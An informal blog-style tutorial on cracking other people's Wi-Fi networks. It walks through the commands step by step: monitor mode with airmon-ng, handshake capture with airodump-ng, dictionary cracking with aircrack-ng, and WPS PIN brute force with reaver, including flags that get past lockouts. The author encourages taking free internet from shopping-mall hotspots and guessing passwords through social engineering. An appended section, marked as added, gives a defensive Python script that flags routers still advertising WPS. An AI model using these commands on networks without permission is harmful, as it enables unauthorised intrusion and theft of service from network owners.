WIFI Hacking
Hello guys, hope you are doing well.
Most of the time people ask me the same question: “How to hack Wi-Fi?”
So this article is dedicated to them.
First of all, our requirements for hacking a Wi-Fi network:
· Kali Linux
· A Wi-Fi adaptor (if your laptop's Wi-Fi does not support monitor mode. Ref: kali.org/)
· A wordlist or password file. It's a txt file with some common words that are used as passwords. Best is to create your own password file using Crunch.
Now we have all these things. One more thing that we need is “A working Brain” :P
Okay, now let's start.
First of all, check the Wi-Fi connection using this command:
#ifconfig
You will see a network adaptor like wlan0, wlan1 or wlan2 (depends on your system).
Now bring it up:
#ifconfig wlan0 up (In my case, my Wi-Fi is wlan0)
It's time to scan the available Wi-Fi networks. We can use two different tools for that: the first is ‘Kismet’ and the second is ‘iwlist’. Here we're using iwlist.
Type #iwlist wlan0 scanning
It will print all available networks with their MAC address and channel number.
Select the network that you want to hack. Copy the SSID name, MAC address and channel number to a notepad.
Now put the Wi-Fi adaptor in monitor mode. Use #airmon-ng start wlan0 , then run ifconfig to confirm (you will see a new Wi-Fi adaptor named mon0).
Time to capture the handshake. The handshake is a capture file that holds the password-related key exchange. Here we're using airodump-ng to capture a valid handshake.
Use #airodump-ng mon0 --bssid aa:bb:cc:dd:ee --channel 1 --write key
Wait until a valid handshake is found; it can take up to 45 minutes. When it shows that a valid handshake was found, press Ctrl+C to terminate the job. Now we have the capture file named key.cap
Here we need a dictionary or wordlist to crack the password. PS: the password will only be cracked if the wordlist contains the password in plain text. Better to use your own wordlist (do social engineering for password guessing and use Crunch to create your own wordlist).
Time to run the password cracker. Here we are using aircrack-ng; it's the best tool ever to crack Wi-Fi passwords.
Run # aircrack-ng /root/key.cap -w /root/wordlist/z3r0.lst
Wait for the password to be cracked. If the password is cracked, it will be shown in plain text.
If WPS is enabled on the Wi-Fi
Most shopping malls have their own Wi-Fi zones, but they protect them using WPA2-PSK, so it's hard to crack them all. But they make a big mistake: they leave the WPS connection enabled, and it's like a jackpot for whoever wants to hack Wi-Fi and use free internet (bill paid by the Wi-Fi zone owner).
Reaver is the best tool to crack a Wi-Fi network with WPS enabled.
Normally we can use this command:
#reaver -i mon0 -c 1 -b aa:bb:cc:dd:ee -vv
But sometimes the admin blocks continuous WPS requests, so here we use this command:
#reaver -i mon0 -c 6 -b aa:bb:cc:dd:ee -vv -L -N -d 15 -t .5 -r 3:15
Details:
-i : interface
-c : channel
-b : BSSID (MAC address of the Wi-Fi router)
-L : ignore the locked WPS status
-N : don't send NACK packets when errors are detected
-d : delay (-d 15 = delay 15 seconds between PIN attempts)
-t : timeout period (-t .5 = half-second timeout)
-r : rest (-r 3:15 = after 3 attempts, sleep for 15 seconds)
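As an added defender-side example (not part of this article), the script below parses an `iw dev wlan0 scan` dump and lists every access point that still advertises WPS, the configuration the section above calls a jackpot; the sample scan text is constructed, and the iw field names are an assumption to check against your own iw version. Note that the "AP setup locked" flag is not a fix, since the -L option above simply ignores it: the mitigation for a network owner is to turn WPS off on the router and confirm that the WPS element disappears from the scan.

```python
import re

# Constructed sample laid out like `iw dev wlan0 scan` output (assumption:
# check the field names against your own iw version); not a real capture.
SAMPLE_SCAN = """\
BSS aa:bb:cc:dd:ee:01(on wlan0)
\tSSID: MallGuest
\tWPS:\t * Version: 1.0
\t\t * Wi-Fi Protected Setup State: 2 (Configured)
\t\t * AP setup locked: 0x01
BSS aa:bb:cc:dd:ee:02(on wlan0)
\tSSID: HomeNet
\tWPS:\t * Version: 1.0
\t\t * Wi-Fi Protected Setup State: 2 (Configured)
BSS aa:bb:cc:dd:ee:03(on wlan0)
\tSSID: Office
"""

def parse_scan(text):
    """Return one dict per BSS block: bssid, ssid, wps, wps_locked."""
    aps, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"BSS ([0-9a-f:]{17})", line)
        if m:
            cur = {"bssid": m.group(1), "ssid": "", "wps": False, "wps_locked": False}
            aps.append(cur)
        elif cur is None:
            continue
        elif line.startswith("SSID:"):
            cur["ssid"] = line[5:].strip()
        elif line.startswith("WPS:"):          # beacon carries a WPS element
            cur["wps"] = True
        elif line.startswith("* AP setup locked:"):
            cur["wps_locked"] = int(line.rsplit(" ", 1)[1], 16) != 0
    return aps

def wps_findings(aps):
    """List (ssid, bssid, verdict) for every AP that advertises WPS."""
    out = []
    for ap in aps:
        if ap["wps"]:
            state = "locked" if ap["wps_locked"] else "unlocked"
            out.append((ap["ssid"], ap["bssid"], f"WPS enabled, {state}: disable WPS"))
    return out

if __name__ == "__main__":
    for ssid, bssid, verdict in wps_findings(parse_scan(SAMPLE_SCAN)):
        print(f"{ssid:<10} {bssid}  {verdict}")
```

To audit a live network, replace SAMPLE_SCAN with the output of `iw dev wlan0 scan` run as root on your own adaptor.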